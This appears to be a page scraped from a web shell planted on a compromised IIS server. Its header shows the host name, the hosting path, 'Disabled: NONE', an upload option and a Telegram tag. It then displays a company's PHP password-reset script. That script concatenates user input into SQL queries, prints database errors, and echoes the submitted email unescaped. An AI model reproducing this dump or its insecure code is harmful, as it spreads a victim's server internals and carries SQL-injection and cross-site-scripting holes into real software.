HEX
Server: Microsoft-IIS/8.5
System: Windows NT YDAWBH120 6.3 build 9600 (Windows Server 2012 R2 Standard Edition) AMD64
User: tentjecom_web (0)
PHP: 7.4.14
Disabled: NONE
$ pwd: D:/HostingSpaces/SBogers10/promic.komma.pro/wwwroot/nl/
Upload Files
File: D:/HostingSpaces/SBogers10/promic.komma.pro/wwwroot/nl/passwort_vergessen.php
<?php

if (isset($_POST['emailadres'])){	$verzenden = true; }

if(isset($_POST['emailadres']) && !preg_match('/[\w-\.]+@([\w-]+\.)+[\w-]{2,4}/', $_POST['emailadres'])){ 
	$valid_emailadres = false;
	$emailadres = $_POST['emailadres'];
	$emailadres = trim($emailadres);
}else{
	$emailadres = $_POST['emailadres'];
	$emailadres = trim($emailadres);
	$lengte_emailadres = strlen($emailadres);
	$emailadres = strtolower($emailadres);
	$emailadres = checkData($emailadres);
	$q_emailadres = "SELECT emailadres FROM accounts WHERE emailadres ='$emailadres'";
	$r_emailadres = mysql_query($q_emailadres);
	$rec_emailadres = mysql_fetch_assoc($r_emailadres);
	$data_mailadres = $rec_emailadres['emailadres'];

	if($data_mailadres == $emailadres){ $alGeregistreerd = true; }else{ $alGeregistreerd = false; }
	
	if($lengte_emailadres < 250 && $alGeregistreerd){
		$valid_emailadres = true;
	}else{
		$valid_emailadres = false;
	}
}

if($verzenden && $valid_emailadres){
					
	$datumin = date("Y-m-d");
	$query = "SELECT * FROM accounts WHERE emailadres ='$emailadres'";
	$result2 = mysql_query($query) or die(mysql_error());
	$record2 = mysql_fetch_assoc($result2);
	$achternaam = html_entity_decode($record2['achternaam']);
	$aanhef = $record2['aanhef'];
	$data_mailadres = $record2['emailadres'];
	
	$id = $record2['account_id'];
	$code = $record2['code'];
	
	$hash = sha1($data_mailadres.$code);

	if($result2){
			
		$link_user= "http://www.promic.nl/de/account-password/?i=" . $id. "&h=" . $hash;

		$bericht = "
<body style=\"margin: 10px; background-color:#fff;\" >

<style>
a{
	color:#F7750B;
	text-decoration:underline;
}
</style>
<div style=\"color:#231f20; font-family:Verdana,Geneva,sans-serif; font-size:11px; line-height:18px; padding-bottom:23px; width: 800px;\">
Sehr $aanhef $achternaam,<br><br>

Sie oder eine andere Person haben die Zugangsdaten zu Ihrem Account bei www.promic.nl neu angefordert. <br>
Bitte hier unten auf den Link klicken und ein neues Passwort eingeben.<br>
Wenn der Link nicht funktioniert, kopieren Sie bitte die URL und f&uuml;gen Sie in ein neues Browser-Fenster ein.<br><br>

$link_user <br><br>
		
Viel Erfolg mit der Nutzung Ihres Accounts.<br><br>


With kind regards,<br>
Promic B.V.<br><br>

Randweg-Zuid 19<br>
6021 PT Budel<br>
The Netherlands
</div>
</body>";

		$send_message = false;
					
		$from = "info@promic.nl";
		$from_naam = "Promic B.V.";
		$onderwerp = "Passwort vergessen Promic.nl";
		
		require_once '../css-js/phpmailer/class.phpmailer.php';
		
		$mail = new PHPMailer(true); //defaults to using php "mail()"; the true param means it will throw exceptions on errors, which we need to catch
	
		try {
			$mail->AddReplyTo($from , $from_naam);
			$mail->AddAddress($emailadres);
			$mail->SetFrom($from, $from_naam);
			$mail->AddReplyTo($from, $from_naam);
			$mail->Subject = $onderwerp;
			$mail->MsgHTML($bericht);
			$mail->Send();
			$send_message = true;
		} catch (phpmailerException $e) {
			$send_message = false;
			echo $e->errorMessage(); //Pretty error messages from PHPMailer
		} catch (Exception $e) {
			$send_message = false;
			echo $e->getMessage(); //Boring error messages from anything else!
		}
					
		if ($send_message) {
			$statusVerwerking = "geslaagd";
		}else{
			$statusVerwerking = "gefaald";
		}
	}
}


if(empty($statusVerwerking)){ ?>

<div id="systeemFormulier">
<h1>Passwort vergessen</h1>

<?php if($verzenden){ ?><div class="foutmelding">Bitte f&uuml;llen Sie Ihre Daten vollst&auml;ndig und korrekt ein.</div><?php } ?>

<form id="aanmeldenAccount" class="de" name="aanmeldenAccount" action="<?php $_SERVER['PHP_SELF']; ?>" method="post"/>

<input id="emailadres" name="emailadres" <?php if($verzenden && !$valid_emailadres){ echo("class=\"error\""); }?> type="text" value="<?php if(!empty($emailadres)){ echo($emailadres); }else{ echo("E-Mail Adresse"); } ?>" />

<?php 
	if ($verzenden == true && !$alGeregistreerd){ ?>
		<div class="foutmelding">Sie haben leider eine falsche E-Mail-Adresse eingegeben oder die Adresse ist bei uns nicht registriert.</div>
	<?php } ?>
	
<a id="systeemFormulierSubmit" class="ctaButton ctaBlack animationBlack">
    <span class="left"><span class="text">Passwort anfordern</span><span class="up"></span><span class="hover"></span></span>
    <span class="right"><span class="icon arrowRight"></span><span class="up"></span><span class="hover"></span></span>
</a>
 
</form>

</div>
<div id="fullVerticalLine"><div class="line"></div></div>
<div id="systeemFormulierRight">
	<p>Geben Sie Ihre E-Mail-Adresse ein und Sie bekommen sofort ein neues Passwort zugeschickt.</p>
</div>

<?php }else if($statusVerwerking == "geslaagd"){ ?>

<div id="systeemFormulier">
<h1>Passwort vergessen</h1>

<p><strong>Sehr <?php echo($aanhef." ". $achternaam); ?>,</strong><br /><br />

Es wurde eine Nachricht an <strong><?php echo($emailadres); ?></strong> geschickt, um ein neues Passwort einzurichten. Bitte folgen Sie den Anweisungen.

<br /><br />Mit freundlichen Gr&uuml;&szlig;en,
<br />Promic B.V.</p>
</div>

<?php }else if($statusVerwerking == "gefaald"){ ?>

<div id="systeemFormulier">
<h1>Passwort vergessen</h1>
<p>Es trat leider ein Fehler auf. Bitte versuchen Sie es sp&auml;ter nochmals. Wenn das Problem weiterhin besteht wenden Sie sich bitte an <a href="mailto:info@promic.nl">info@promic.nl.</a><br /><br />
Wir entschuldigen uns f&uuml;r die Unannehmlichkeiten.</p>
</div>
<?php } ?>
@ Telegram